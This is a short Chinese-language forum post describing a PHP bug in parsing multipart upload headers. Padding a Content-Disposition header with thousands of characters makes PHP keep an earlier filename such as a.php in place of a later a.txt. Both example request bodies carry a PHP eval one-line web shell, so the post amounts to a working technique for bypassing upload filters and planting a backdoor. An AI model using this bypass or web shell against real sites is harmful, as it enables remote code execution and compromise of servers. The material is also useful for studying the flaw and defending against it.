Post #4731

3. PHP读取上传文件的实现也有bug，因为随便截断内容而导致上传的文件名不一致 上传文件时，可以把filename和name写在下一行，这是RFC要求的 而且filename和name可以出现多次，默认取最后一个 Content-Disposition: xxx; filename="a.php" name="file" filename="a.txt" <?php eval($_POST[1]);?> 这样写，最后上传的是a.txt而不是a.php，注意filename="a.txt"写在新的一行 但是如果把上面xxx换成五千多个x Content-Disposition: 假装这里有五千多个x; filename="a.php" name="file" filename="a.txt" <?php eval($_POST[1]);?> 最后上传的就是a.php而不是a.txt 怎么多加了几个x结果就不一样了，他们代码到底是怎么写的